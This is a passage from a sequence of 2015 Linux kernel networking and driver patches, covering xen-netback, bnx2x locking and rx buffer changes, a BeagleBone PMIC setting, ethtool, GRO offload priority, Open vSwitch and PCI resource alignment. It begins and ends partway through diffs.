++++++++++++++++++-------------- 1 file changed, 19 insertions(+), 14 deletions(-) diff --git a/drivers/net/xen-netback/xenbus.c b/drivers/net/xen-netback/xenbus.c index fee02414529e..968787abf78d 100644 --- a/drivers/net/xen-netback/xenbus.c +++ b/drivers/net/xen-netback/xenbus.c @@ -34,6 +34,8 @@ struct backend_info { enum xenbus_state frontend_state; struct xenbus_watch hotplug_status_watch; u8 have_hotplug_status_watch:1; + + const char *hotplug_script; }; static int connect_rings(struct backend_info *be, struct xenvif_queue *queue); @@ -238,6 +240,7 @@ static int netback_remove(struct xenbus_device *dev) xenvif_free(be->vif); be->vif = NULL; } + kfree(be->hotplug_script); kfree(be); dev_set_drvdata(&dev->dev, NULL); return 0; @@ -255,6 +258,7 @@ static int netback_probe(struct xenbus_device *dev, struct xenbus_transaction xbt; int err; int sg; + const char *script; struct backend_info *be = kzalloc(sizeof(struct backend_info), GFP_KERNEL); if (!be) { @@ -347,6 +351,15 @@ static int netback_probe(struct xenbus_device *dev, if (err) pr_debug("Error writing multi-queue-max-queues\n"); + script = xenbus_read(XBT_NIL, dev->nodename, "script", NULL); + if (IS_ERR(script)) { + err = PTR_ERR(script); + xenbus_dev_fatal(dev, err, "reading script"); + goto fail; + } + + be->hotplug_script = script; + err = xenbus_switch_state(dev, XenbusStateInitWait); if (err) goto fail; @@ -379,22 +392,14 @@ static int netback_uevent(struct xenbus_device *xdev, struct kobj_uevent_env *env) { struct backend_info *be = dev_get_drvdata(&xdev->dev); - char *val; - val = xenbus_read(XBT_NIL, xdev->nodename, "script", NULL); - if (IS_ERR(val)) { - int err = PTR_ERR(val); - xenbus_dev_fatal(xdev, err, "reading script"); - return err; - } else { - if (add_uevent_var(env, "script=%s", val)) { - kfree(val); - return -ENOMEM; - } - kfree(val); - } + if (!be) + return 0; + + if (add_uevent_var(env, "script=%s", be->hotplug_script)) + return -ENOMEM; - if (!be || !be->vif) + if (!be->vif) return 0; return add_uevent_var(env, "vif=%s", be->vif->dev->name); From c6e36d8c1a76be7a7afa2669483857dadec1e99c Mon Sep 17 00:00:00 2001 From: Yuval Mintz Date: Mon, 1 Jun 2015 15:08:18 +0300 Subject: [PATCH 559/872] bnx2x: Move statistics implementation into semaphores Commit dff173de84958 ("bnx2x: Fix statistics locking scheme") changed the bnx2x locking around statistics state into using a mutex - but the lock is being accessed via a timer which is forbidden. [If compiled with CONFIG_DEBUG_MUTEXES, logs show a warning about accessing the mutex in interrupt context] This moves the implementation into using a semaphore [with size '1'] instead. Signed-off-by: Yuval Mintz Signed-off-by: Ariel Elior Signed-off-by: David S. Miller --- drivers/net/ethernet/broadcom/bnx2x/bnx2x.h | 2 +- .../net/ethernet/broadcom/bnx2x/bnx2x_main.c | 9 +++++---- .../net/ethernet/broadcom/bnx2x/bnx2x_stats.c | 20 +++++++++++++------ 3 files changed, 20 insertions(+), 11 deletions(-) diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h index a3b0f7a0c61e..1f82a04ce01a 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h @@ -1774,7 +1774,7 @@ struct bnx2x { int stats_state; /* used for synchronization of concurrent threads statistics handling */ - struct mutex stats_lock; + struct semaphore stats_lock; /* used by dmae command loader */ struct dmae_command stats_dmae; diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c index fd52ce95127e..33501bcddc48 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c @@ -12054,7 +12054,7 @@ static int bnx2x_init_bp(struct bnx2x *bp) mutex_init(&bp->port.phy_mutex); mutex_init(&bp->fw_mb_mutex); mutex_init(&bp->drv_info_mutex); - mutex_init(&bp->stats_lock); + sema_init(&bp->stats_lock, 1); bp->drv_info_mng_owner = false; INIT_DELAYED_WORK(&bp->sp_task, bnx2x_sp_task); @@ -13690,9 +13690,10 @@ static int bnx2x_eeh_nic_unload(struct bnx2x *bp) cancel_delayed_work_sync(&bp->sp_task); cancel_delayed_work_sync(&bp->period_task); - mutex_lock(&bp->stats_lock); - bp->stats_state = STATS_STATE_DISABLED; - mutex_unlock(&bp->stats_lock); + if (!down_timeout(&bp->stats_lock, HZ / 10)) { + bp->stats_state = STATS_STATE_DISABLED; + up(&bp->stats_lock); + } bnx2x_save_statistics(bp); diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_stats.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_stats.c index 266b055c2360..69d699f0730a 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_stats.c +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_stats.c @@ -1372,19 +1372,23 @@ void bnx2x_stats_handle(struct bnx2x *bp, enum bnx2x_stats_event event) * that context in case someone is in the middle of a transition. * For other events, wait a bit until lock is taken. */ - if (!mutex_trylock(&bp->stats_lock)) { + if (down_trylock(&bp->stats_lock)) { if (event == STATS_EVENT_UPDATE) return; DP(BNX2X_MSG_STATS, "Unlikely stats' lock contention [event %d]\n", event); - mutex_lock(&bp->stats_lock); + if (unlikely(down_timeout(&bp->stats_lock, HZ / 10))) { + BNX2X_ERR("Failed to take stats lock [event %d]\n", + event); + return; + } } bnx2x_stats_stm[state][event].action(bp); bp->stats_state = bnx2x_stats_stm[state][event].next_state; - mutex_unlock(&bp->stats_lock); + up(&bp->stats_lock); if ((event != STATS_EVENT_UPDATE) || netif_msg_timer(bp)) DP(BNX2X_MSG_STATS, "state %d -> event %d -> state %d\n", @@ -1970,7 +1974,11 @@ int bnx2x_stats_safe_exec(struct bnx2x *bp, /* Wait for statistics to end [while blocking further requests], * then run supplied function 'safely'. */ - mutex_lock(&bp->stats_lock); + rc = down_timeout(&bp->stats_lock, HZ / 10); + if (unlikely(rc)) { + BNX2X_ERR("Failed to take statistics lock for safe execution\n"); + goto out_no_lock; + } bnx2x_stats_comp(bp); while (bp->stats_pending && cnt--) @@ -1988,7 +1996,7 @@ int bnx2x_stats_safe_exec(struct bnx2x *bp, /* No need to restart statistics - if they're enabled, the timer * will restart the statistics. */ - mutex_unlock(&bp->stats_lock); - + up(&bp->stats_lock); +out_no_lock: return rc; } From 7a6cb0abe1aa63334f3ded6d2b6c8eca80e72302 Mon Sep 17 00:00:00 2001 From: Matthijs van Duin Date: Mon, 1 Jun 2015 21:33:28 +0200 Subject: [PATCH 560/872] ARM: dts: am335x-boneblack: disable RTC-only sleep to avoid hardware damage Avoid entering "RTC-only mode" at poweroff. It is unsupported by most versions of BeagleBone, and risks hardware damage. The damaging configuration is having system-power-controller without ti,pmic-shutdown-controller. Reported-by: Matthijs van Duin Tested-by: Matthijs van Duin Signed-off-by: Robert Nelson Cc: Tony Lindgren Cc: Felipe Balbi Cc: Johan Hovold [Matthijs van Duin: added explanatory comments] Signed-off-by: Matthijs van Duin Fixes: http://bugs.elinux.org/issues/143 Cc: stable@vger.kernel.org # v3.12+ [tony@atomide.com: updated comments with the hardware breaking info] Signed-off-by: Tony Lindgren --- arch/arm/boot/dts/am335x-bone-common.dtsi | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/arch/arm/boot/dts/am335x-bone-common.dtsi b/arch/arm/boot/dts/am335x-bone-common.dtsi index c3255e0c90aa..dbb3f4d2bf84 100644 --- a/arch/arm/boot/dts/am335x-bone-common.dtsi +++ b/arch/arm/boot/dts/am335x-bone-common.dtsi @@ -223,6 +223,25 @@ /include/ "tps65217.dtsi" &tps { + /* + * Configure pmic to enter OFF-state instead of SLEEP-state ("RTC-only + * mode") at poweroff. Most BeagleBone versions do not support RTC-only + * mode and risk hardware damage if this mode is entered. + * + * For details, see linux-omap mailing list May 2015 thread + * [PATCH] ARM: dts: am335x-bone* enable pmic-shutdown-controller + * In particular, messages: + * http://www.spinics.net/lists/linux-omap/msg118585.html + * http://www.spinics.net/lists/linux-omap/msg118615.html + * + * You can override this later with + * &tps { /delete-property/ ti,pmic-shutdown-controller; } + * if you want to use RTC-only mode and made sure you are not affected + * by the hardware problems. (Tip: double-check by performing a current + * measurement after shutdown: it should be less than 1 mA.) + */ + ti,pmic-shutdown-controller; + regulators { dcdc1_reg: regulator@0 { regulator-name = "vdds_dpr"; From 18ec898ee54e03a9aab8b54db50cb2b36209d313 Mon Sep 17 00:00:00 2001 From: "David S. Miller" Date: Mon, 1 Jun 2015 14:43:50 -0700 Subject: [PATCH 561/872] Revert "net: core: 'ethtool' issue with querying phy settings" This reverts commit f96dee13b8e10f00840124255bed1d8b4c6afd6f. It isn't right, ethtool is meant to manage one PHY instance per netdevice at a time, and this is selected by the SET command. Therefore by definition the GET command must only return the settings for the configured and selected PHY. Reported-by: Ben Hutchings Signed-off-by: David S. Miller --- net/core/ethtool.c | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/net/core/ethtool.c b/net/core/ethtool.c index 1347e11f5cc9..1d00b8922902 100644 --- a/net/core/ethtool.c +++ b/net/core/ethtool.c @@ -359,15 +359,7 @@ static int ethtool_get_settings(struct net_device *dev, void __user *useraddr) int err; struct ethtool_cmd cmd; - if (!dev->ethtool_ops->get_settings) - return -EOPNOTSUPP; - - if (copy_from_user(&cmd, useraddr, sizeof(cmd))) - return -EFAULT; - - cmd.cmd = ETHTOOL_GSET; - - err = dev->ethtool_ops->get_settings(dev, &cmd); + err = __ethtool_get_settings(dev, &cmd); if (err < 0) return err; From bdef7de4b8d9be4cf7bf5aea977f827310ab3ff0 Mon Sep 17 00:00:00 2001 From: "David S. Miller" Date: Mon, 1 Jun 2015 14:56:09 -0700 Subject: [PATCH 562/872] net: Add priority to packet_offload objects. When we scan a packet for GRO processing, we want to see the most common packet types in the front of the offload_base list. So add a priority field so we can handle this properly. IPv4/IPv6 get the highest priority with the implicit zero priority field. Next comes ethernet with a priority of 10, and then we have the MPLS types with a priority of 15. Suggested-by: Eric Dumazet Suggested-by: Toshiaki Makita Signed-off-by: David S. Miller --- include/linux/netdevice.h | 1 + net/core/dev.c | 8 ++++++-- net/ethernet/eth.c | 1 + net/mpls/mpls_gso.c | 2 ++ 4 files changed, 10 insertions(+), 2 deletions(-) diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h index 51f8d2f5dc3f..6f5f71ff5169 100644 --- a/include/linux/netdevice.h +++ b/include/linux/netdevice.h @@ -1997,6 +1997,7 @@ struct offload_callbacks { struct packet_offload { __be16 type; /* This is really htons(ether_type). */ + u16 priority; struct offload_callbacks callbacks; struct list_head list; }; diff --git a/net/core/dev.c b/net/core/dev.c index 594163d0c6eb..0602e917a305 100644 --- a/net/core/dev.c +++ b/net/core/dev.c @@ -469,10 +469,14 @@ EXPORT_SYMBOL(dev_remove_pack); */ void dev_add_offload(struct packet_offload *po) { - struct list_head *head = &offload_base; + struct packet_offload *elem; spin_lock(&offload_lock); - list_add_rcu(&po->list, head); + list_for_each_entry(elem, &offload_base, list) { + if (po->priority < elem->priority) + break; + } + list_add_rcu(&po->list, elem->list.prev); spin_unlock(&offload_lock); } EXPORT_SYMBOL(dev_add_offload); diff --git a/net/ethernet/eth.c b/net/ethernet/eth.c index c3325bd2f3fb..7d0e239a6755 100644 --- a/net/ethernet/eth.c +++ b/net/ethernet/eth.c @@ -470,6 +470,7 @@ EXPORT_SYMBOL(eth_gro_complete); static struct packet_offload eth_packet_offload __read_mostly = { .type = cpu_to_be16(ETH_P_TEB), + .priority = 10, .callbacks = { .gro_receive = eth_gro_receive, .gro_complete = eth_gro_complete, diff --git a/net/mpls/mpls_gso.c b/net/mpls/mpls_gso.c index 809df534a720..0183b32da942 100644 --- a/net/mpls/mpls_gso.c +++ b/net/mpls/mpls_gso.c @@ -62,6 +62,7 @@ static struct sk_buff *mpls_gso_segment(struct sk_buff *skb, static struct packet_offload mpls_mc_offload __read_mostly = { .type = cpu_to_be16(ETH_P_MPLS_MC), + .priority = 15, .callbacks = { .gso_segment = mpls_gso_segment, }, @@ -69,6 +70,7 @@ static struct packet_offload mpls_mc_offload __read_mostly = { static struct packet_offload mpls_uc_offload __read_mostly = { .type = cpu_to_be16(ETH_P_MPLS_UC), + .priority = 15, .callbacks = { .gso_segment = mpls_gso_segment, }, From ccea74457bbdafe33dce8bffcb5cb183aeb5f2bb Mon Sep 17 00:00:00 2001 From: Neil McKee Date: Tue, 26 May 2015 20:59:43 -0700 Subject: [PATCH 563/872] openvswitch: include datapath actions with sampled-packet upcall to userspace If new optional attribute OVS_USERSPACE_ATTR_ACTIONS is added to an OVS_ACTION_ATTR_USERSPACE action, then include the datapath actions in the upcall. This Directly associates the sampled packet with the path it takes through the virtual switch. Path information currently includes mangling, encapsulation and decapsulation actions for tunneling protocols GRE, VXLAN, Geneve, MPLS and QinQ, but this extension requires no further changes to accommodate datapath actions that may be added in the future. Adding path information enhances visibility into complex virtual networks. Signed-off-by: Neil McKee Signed-off-by: David S. Miller --- include/uapi/linux/openvswitch.h | 4 ++++ net/openvswitch/actions.c | 23 +++++++++++++++-------- net/openvswitch/datapath.c | 18 ++++++++++++++++-- net/openvswitch/datapath.h | 2 ++ 4 files changed, 37 insertions(+), 10 deletions(-) diff --git a/include/uapi/linux/openvswitch.h b/include/uapi/linux/openvswitch.h index bbd49a0c46c7..1dab77601c21 100644 --- a/include/uapi/linux/openvswitch.h +++ b/include/uapi/linux/openvswitch.h @@ -153,6 +153,8 @@ enum ovs_packet_cmd { * flow key against the kernel's. * @OVS_PACKET_ATTR_ACTIONS: Contains actions for the packet. Used * for %OVS_PACKET_CMD_EXECUTE. It has nested %OVS_ACTION_ATTR_* attributes. + * Also used in upcall when %OVS_ACTION_ATTR_USERSPACE has optional + * %OVS_USERSPACE_ATTR_ACTIONS attribute. * @OVS_PACKET_ATTR_USERDATA: Present for an %OVS_PACKET_CMD_ACTION * notification if the %OVS_ACTION_ATTR_USERSPACE action specified an * %OVS_USERSPACE_ATTR_USERDATA attribute, with the same length and content @@ -528,6 +530,7 @@ enum ovs_sample_attr { * copied to the %OVS_PACKET_CMD_ACTION message as %OVS_PACKET_ATTR_USERDATA. * @OVS_USERSPACE_ATTR_EGRESS_TUN_PORT: If present, u32 output port to get * tunnel info. + * @OVS_USERSPACE_ATTR_ACTIONS: If present, send actions with upcall. */ enum ovs_userspace_attr { OVS_USERSPACE_ATTR_UNSPEC, @@ -535,6 +538,7 @@ enum ovs_userspace_attr { OVS_USERSPACE_ATTR_USERDATA, /* Optional user-specified cookie. */ OVS_USERSPACE_ATTR_EGRESS_TUN_PORT, /* Optional, u32 output port * to get tunnel info. */ + OVS_USERSPACE_ATTR_ACTIONS, /* Optional flag to get actions. */ __OVS_USERSPACE_ATTR_MAX }; diff --git a/net/openvswitch/actions.c b/net/openvswitch/actions.c index b491c1c296fe..8a8c0b8b4f63 100644 --- a/net/openvswitch/actions.c +++ b/net/openvswitch/actions.c @@ -608,17 +608,16 @@ static void do_output(struct datapath *dp, struct sk_buff *skb, int out_port) } static int output_userspace(struct datapath *dp, struct sk_buff *skb, - struct sw_flow_key *key, const struct nlattr *attr) + struct sw_flow_key *key, const struct nlattr *attr, + const struct nlattr *actions, int actions_len) { struct ovs_tunnel_info info; struct dp_upcall_info upcall; const struct nlattr *a; int rem; + memset(&upcall, 0, sizeof(upcall)); upcall.cmd = OVS_PACKET_CMD_ACTION; - upcall.userdata = NULL; - upcall.portid = 0; - upcall.egress_tun_info = NULL; for (a = nla_data(attr), rem = nla_len(attr); rem > 0; a = nla_next(a, &rem)) { @@ -647,6 +646,13 @@ static int output_userspace(struct datapath *dp, struct sk_buff *skb, break; } + case OVS_USERSPACE_ATTR_ACTIONS: { + /* Include actions. */ + upcall.actions = actions; + upcall.actions_len = actions_len; + break; + } + } /* End of switch. */ } @@ -654,7 +660,8 @@ static int output_userspace(struct datapath *dp, struct sk_buff *skb, } static int sample(struct datapath *dp, struct sk_buff *skb, - struct sw_flow_key *key, const struct nlattr *attr) + struct sw_flow_key *key, const struct nlattr *attr, + const struct nlattr *actions, int actions_len) { const struct nlattr *acts_list = NULL; const struct nlattr *a; @@ -688,7 +695,7 @@ static int sample(struct datapath *dp, struct sk_buff *skb, */ if (likely(nla_type(a) == OVS_ACTION_ATTR_USERSPACE && nla_is_last(a, rem))) - return output_userspace(dp, skb, key, a); + return output_userspace(dp, skb, key, a, actions, actions_len); skb = skb_clone(skb, GFP_ATOMIC); if (!skb) @@ -872,7 +879,7 @@ static int do_execute_actions(struct datapath *dp, struct sk_buff *skb, break; case OVS_ACTION_ATTR_USERSPACE: - output_userspace(dp, skb, key, a); + output_userspace(dp, skb, key, a, attr, len); break; case OVS_ACTION_ATTR_HASH: @@ -916,7 +923,7 @@ static int do_execute_actions(struct datapath *dp, struct sk_buff *skb, break; case OVS_ACTION_ATTR_SAMPLE: - err = sample(dp, skb, key, a); + err = sample(dp, skb, key, a, attr, len); break; } diff --git a/net/openvswitch/datapath.c b/net/openvswitch/datapath.c index 3b90461317ec..ff8c4a4c1609 100644 --- a/net/openvswitch/datapath.c +++ b/net/openvswitch/datapath.c @@ -272,10 +272,9 @@ void ovs_dp_process_packet(struct sk_buff *skb, struct sw_flow_key *key) struct dp_upcall_info upcall; int error; + memset(&upcall, 0, sizeof(upcall)); upcall.cmd = OVS_PACKET_CMD_MISS; - upcall.userdata = NULL; upcall.portid = ovs_vport_find_upcall_portid(p, skb); - upcall.egress_tun_info = NULL; error = ovs_dp_upcall(dp, skb, key, &upcall); if (unlikely(error)) kfree_skb(skb); @@ -397,6 +396,10 @@ static size_t upcall_msg_size(const struct dp_upcall_info *upcall_info, if (upcall_info->egress_tun_info) size += nla_total_size(ovs_tun_key_attr_size()); + /* OVS_PACKET_ATTR_ACTIONS */ + if (upcall_info->actions_len) + size += nla_total_size(upcall_info->actions_len); + return size; } @@ -478,6 +481,17 @@ static int queue_userspace_packet(struct datapath *dp, struct sk_buff *skb, nla_nest_end(user_skb, nla); } + if (upcall_info->actions_len) { + nla = nla_nest_start(user_skb, OVS_PACKET_ATTR_ACTIONS); + err = ovs_nla_put_actions(upcall_info->actions, + upcall_info->actions_len, + user_skb); + if (!err) + nla_nest_end(user_skb, nla); + else + nla_nest_cancel(user_skb, nla); + } + /* Only reserve room for attribute header, packet data is added * in skb_zerocopy() */ if (!(nla = nla_reserve(user_skb, OVS_PACKET_ATTR_PACKET, 0))) { diff --git a/net/openvswitch/datapath.h b/net/openvswitch/datapath.h index 4ec4a480b147..cd691e935e08 100644 --- a/net/openvswitch/datapath.h +++ b/net/openvswitch/datapath.h @@ -116,6 +116,8 @@ struct ovs_skb_cb { struct dp_upcall_info { const struct ovs_tunnel_info *egress_tun_info; const struct nlattr *userdata; + const struct nlattr *actions; + int actions_len; u32 portid; u8 cmd; }; From 552bc94ebeeb189d0ac682dae95cf05e6b72d7fd Mon Sep 17 00:00:00 2001 From: Yinghai Lu Date: Thu, 28 May 2015 22:40:00 -0700 Subject: [PATCH 564/872] PCI: Preserve resource size during alignment reordering In d74b9027a4da ("PCI: Consider additional PF's IOV BAR alignment in sizing and assigning"), we store additional alignment in realloc_head and take this into consideration for assignment. In __assign_resources_sorted(), we changed dev_res->res->start, then used resource_start() (which depends on res->start), so the recomputed res->end was completely bogus. Even if we'd had the correct size, the end would have been off by one. Preserve the resource size when we adjust its alignment. [bhelgaas: changelog] Fixes: d74b9027a4da ("PCI: Consider additional PF's IOV BAR alignment in sizing and assigning") Signed-off-by: Yinghai Lu Signed-off-by: Bjorn Helgaas Acked-by: Wei Yang CC: Benjamin Herrenschmidt --- drivers/pci/setup-bus.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/drivers/pci/setup-bus.c b/drivers/pci/setup-bus.c index aa281d909eb0..508cc56130e3 100644 --- a/drivers/pci/setup-bus.c +++ b/drivers/pci/setup-bus.c @@ -428,9 +428,10 @@ static void __assign_resources_sorted(struct list_head *head, * consistent. */ if (add_align > dev_res->res->start) { + resource_size_t r_size = resource_size(dev_res->res); + dev_res->res->start = add_align; - dev_res->res->end = add_align + - resource_size(dev_res->res); + dev_res->res->end = add_align + r_size - 1; list_for_each_entry(dev_res2, head, list) { align = pci_resource_alignment(dev_res2->dev, From 4cace675d687ebd2d813e90af80ff87ee85202f9 Mon Sep 17 00:00:00 2001 From: Gabriel Krisman Bertazi Date: Wed, 27 May 2015 13:51:43 -0300 Subject: [PATCH 565/872] bnx2x: Alloc 4k fragment for each rx ring buffer element The driver allocates one page for each buffer on the rx ring, which is too much on architectures like ppc64 and can cause unexpected allocation failures when the system is under stress. Now, we keep a memory pool per queue, and if the architecture's PAGE_SIZE is greater than 4k, we fragment pages and assign each 4k segment to a ring element, which reduces the overall memory consumption on such architectures. This helps avoiding errors like the example below: [bnx2x_alloc_rx_sge:435(eth1)]Can't alloc sge [c00000037ffeb900] [d000000075eddeb4] .bnx2x_alloc_rx_sge+0x44/0x200 [bnx2x] [c00000037ffeb9b0] [d000000075ee0b34] .bnx2x_fill_frag_skb+0x1ac/0x460 [bnx2x] [c00000037ffebac0] [d000000075ee11f0] .bnx2x_tpa_stop+0x160/0x2e8 [bnx2x] [c00000037ffebb90] [d000000075ee1560] .bnx2x_rx_int+0x1e8/0xc30 [bnx2x] [c00000037ffebcd0] [d000000075ee2084] .bnx2x_poll+0xdc/0x3d8 [bnx2x] (unreliable) Signed-off-by: Gabriel Krisman Bertazi Acked-by: Yuval Mintz Reviewed-by: Lino Sanfilippo Signed-off-by: David S. Miller --- drivers/net/ethernet/broadcom/bnx2x/bnx2x.h | 16 +++++- .../net/ethernet/broadcom/bnx2x/bnx2x_cmn.c | 57 +++++++++++++------ .../net/ethernet/broadcom/bnx2x/bnx2x_cmn.h | 31 +++++++++- 3 files changed, 80 insertions(+), 24 deletions(-) diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h index a3b0f7a0c61e..2ed4c0af595b 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h @@ -357,6 +357,7 @@ struct sw_tx_bd { struct sw_rx_page { struct page *page; DEFINE_DMA_UNMAP_ADDR(mapping); + unsigned int offset; }; union db_prod { @@ -381,9 +382,10 @@ union db_prod { #define PAGES_PER_SGE_SHIFT 0 #define PAGES_PER_SGE (1 << PAGES_PER_SGE_SHIFT) -#define SGE_PAGE_SIZE PAGE_SIZE -#define SGE_PAGE_SHIFT PAGE_SHIFT -#define SGE_PAGE_ALIGN(addr) PAGE_ALIGN((typeof(PAGE_SIZE))(addr)) +#define SGE_PAGE_SHIFT 12 +#define SGE_PAGE_SIZE (1 << SGE_PAGE_SHIFT) +#define SGE_PAGE_MASK (~(SGE_PAGE_SIZE - 1)) +#define SGE_PAGE_ALIGN(addr) (((addr) + SGE_PAGE_SIZE - 1) & SGE_PAGE_MASK) #define SGE_PAGES (SGE_PAGE_SIZE * PAGES_PER_SGE) #define TPA_AGG_SIZE min_t(u32, (min_t(u32, 8, MAX_SKB_FRAGS) * \ SGE_PAGES), 0xffff) @@ -526,6 +528,12 @@ enum bnx2x_tpa_mode_t { TPA_MODE_GRO }; +struct bnx2x_alloc_pool { + struct page *page; + dma_addr_t dma; + unsigned int offset; +}; + struct bnx2x_fastpath { struct bnx2x *bp; /* parent */ @@ -599,6 +607,8 @@ struct bnx2x_fastpath { 4 (for the digits and to make it DWORD aligned) */ #define FP_NAME_SIZE (sizeof(((struct net_device *)0)->name) + 8) char name[FP_NAME_SIZE]; + + struct bnx2x_alloc_pool page_pool; }; #define bnx2x_fp(bp, nr, var) ((bp)->fp[(nr)].var) diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c index 2ef202d10948..e2a65334708d 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c @@ -544,30 +544,49 @@ static void bnx2x_set_gro_params(struct sk_buff *skb, u16 parsing_flags, static int bnx2x_alloc_rx_sge(struct bnx2x *bp, struct bnx2x_fastpath *fp, u16 index, gfp_t gfp_mask) { - struct page *page = alloc_pages(gfp_mask, PAGES_PER_SGE_SHIFT); struct sw_rx_page *sw_buf = &fp->rx_page_ring[index]; struct eth_rx_sge *sge = &fp->rx_sge_ring[index]; + struct bnx2x_alloc_pool *pool = &fp->page_pool; dma_addr_t mapping; - if (unlikely(page == NULL)) { - BNX2X_ERR("Can't alloc sge\n"); - return -ENOMEM; - } + if (!pool->page || (PAGE_SIZE - pool->offset) < SGE_PAGE_SIZE) { - mapping = dma_map_page(&bp->pdev->dev, page, 0, - SGE_PAGES, DMA_FROM_DEVICE); - if (unlikely(dma_mapping_error(&bp->pdev->dev, mapping))) { - __free_pages(page, PAGES_PER_SGE_SHIFT); - BNX2X_ERR("Can't map sge\n"); - return -ENOMEM; + /* put page reference used by the memory pool, since we + * won't be using this page as the mempool anymore. + */ + if (pool->page) + put_page(pool->page); + + pool->page = alloc_pages(gfp_mask, PAGES_PER_SGE_SHIFT); + if (unlikely(!pool->page)) { + BNX2X_ERR("Can't alloc sge\n"); + return -ENOMEM; + } + + pool->dma = dma_map_page(&bp->pdev->dev, pool->page, 0, + PAGE_SIZE, DMA_FROM_DEVICE); + if (unlikely(dma_mapping_error(&bp->pdev->dev, + pool->dma))) { + __free_pages(pool->page, PAGES_PER_SGE_SHIFT); + pool->page = NULL; + BNX2X_ERR("Can't map sge\n"); + return -ENOMEM; + } + pool->offset = 0; } - sw_buf->page = page; + get_page(pool->page); + sw_buf->page = pool->page; + sw_buf->offset = pool->offset; + + mapping = pool->dma + sw_buf->offset; dma_unmap_addr_set(sw_buf, mapping, mapping); sge->addr_hi = cpu_to_le32(U64_HI(mapping)); sge->addr_lo = cpu_to_le32(U64_LO(mapping)); + pool->offset += SGE_PAGE_SIZE; + return 0; } @@ -629,20 +648,22 @@ static int bnx2x_fill_frag_skb(struct bnx2x *bp, struct bnx2x_fastpath *fp, return err; } - /* Unmap the page as we're going to pass it to the stack */ - dma_unmap_page(&bp->pdev->dev, - dma_unmap_addr(&old_rx_pg, mapping), - SGE_PAGES, DMA_FROM_DEVICE); + dma_unmap_single(&bp->pdev->dev, + dma_unmap_addr(&old_rx_pg, mapping), + SGE_PAGE_SIZE, DMA_FROM_DEVICE); /* Add one frag and update the appropriate fields in the skb */ if (fp->mode == TPA_MODE_LRO) - skb_fill_page_desc(skb, j, old_rx_pg.page, 0, frag_len); + skb_fill_page_desc(skb, j, old_rx_pg.page, + old_rx_pg.offset, frag_len); else { /* GRO */ int rem; int offset = 0; for (rem = frag_len; rem > 0; rem -= gro_size) { int len = rem > gro_size ? gro_size : rem; skb_fill_page_desc(skb, frag_id++, - old_rx_pg.page, offset, len); + old_rx_pg.page, + old_rx_pg.offset + offset, + len); if (offset) get_page(old_rx_pg.page); offset += len; diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h index d7a71758e876..2b30081ec26d 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h @@ -804,9 +804,13 @@ static inline void bnx2x_free_rx_sge(struct bnx2x *bp, if (!page) return; - dma_unmap_page(&bp->pdev->dev, dma_unmap_addr(sw_buf, mapping), - SGE_PAGES, DMA_FROM_DEVICE); - __free_pages(page, PAGES_PER_SGE_SHIFT); + /* Since many fragments can share the same page, make sure to + * only unmap and free the page once. + */ + dma_unmap_single(&bp->pdev->dev, dma_unmap_addr(sw_buf, mapping), + SGE_PAGE_SIZE, DMA_FROM_DEVICE); + + put_page(page); sw_buf->page = NULL; sge->addr_hi = 0; @@ -964,6 +968,25 @@ static inline void bnx2x_set_fw_mac_addr(__le16 *fw_hi, __le16 *fw_mid, ((u8 *)fw_lo)[1] = mac[4]; } +static inline void bnx2x_free_rx_mem_pool(struct bnx2x *bp, + struct bnx2x_alloc_pool *pool) +{ + if (!pool->page) + return; + + /* Page was not fully fragmented. Unmap unused space */ + if (pool->offset < PAGE_SIZE) { + dma_addr_t dma = pool->dma + pool->offset; + int size = PAGE_SIZE - pool->offset; + + dma_unmap_single(&bp->pdev->dev, dma, size, DMA_FROM_DEVICE); + } + + put_page(pool->page); + + pool->page = NULL; +} + static inline void bnx2x_free_rx_sge_range(struct bnx2x *bp, struct bnx2x_fastpath *fp, int last) { @@ -974,6 +997,8 @@ static inline void bnx2x_free_rx_sge_range(struct bnx2x *bp, for (i = 0; i < last; i++) bnx2x_free_rx_sge(bp, fp, i); + + bnx2x_free_rx_mem_pool(bp, &fp->page_pool); } static inline void bnx2x_set_next_page_rx_bd(struct bnx2x_fastpath *fp) From ccd740cbc6e01b2a08baa341867063ed2887f4b9 Mon Sep 17 00:00:00 2001 From: Steffen Klassert Date: Fri, 29 May 2015 11:28:26 -0700 Subject: [PATCH 566/872] vti6: Add pmtu handling to vti6_xmit. We currently rely on the PMTU discovery of xfrm. However if a packet is localy sent, the PMTU mechanism of xfrm tries to to local socket notification what might not work for applications like ping that don't check for this. So add pmtu handling to vti6_xmit to report MTU changes immediately. Signed-off-by: Steffen Klassert Signed-off-by: Alexander Duyck Signed-off-by: David S. Miller --- net/ipv6/ip6_vti.c | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/net/ipv6/ip6_vti.c 